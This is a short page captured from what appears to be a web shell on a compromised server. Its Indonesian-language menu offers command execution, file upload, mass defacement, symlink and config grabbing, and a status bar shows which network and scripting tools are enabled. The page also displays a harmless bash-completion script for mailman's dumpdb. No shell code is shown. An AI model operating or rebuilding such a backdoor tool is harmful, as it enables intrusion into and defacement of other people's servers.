OFF | cURL : OFF | WGET : ON | Perl : ON | Python : OFF Directory (0755) : /libx32/../share/snapd/../locale/wal/../st/../../bash-completion/completions/ |
Home | ☍ Command | ☍ Upload File | ☍Info Server | ☍ Buat File | ☍ Mass deface | ☍ Jumping | ☍ Config | ☍ Symlink | ☍ About |
---|
# mailman dumpdb completion -*- shell-script -*- _dumpdb() { local cur prev words cword _init_completion || return if [[ "$cur" == -* ]]; then COMPREPLY=( $(compgen -W '--marshal --pickle --noprint --help' \ -- "$cur") ) else _filedir fi } && complete -F _dumpdb dumpdb # ex: filetype=sh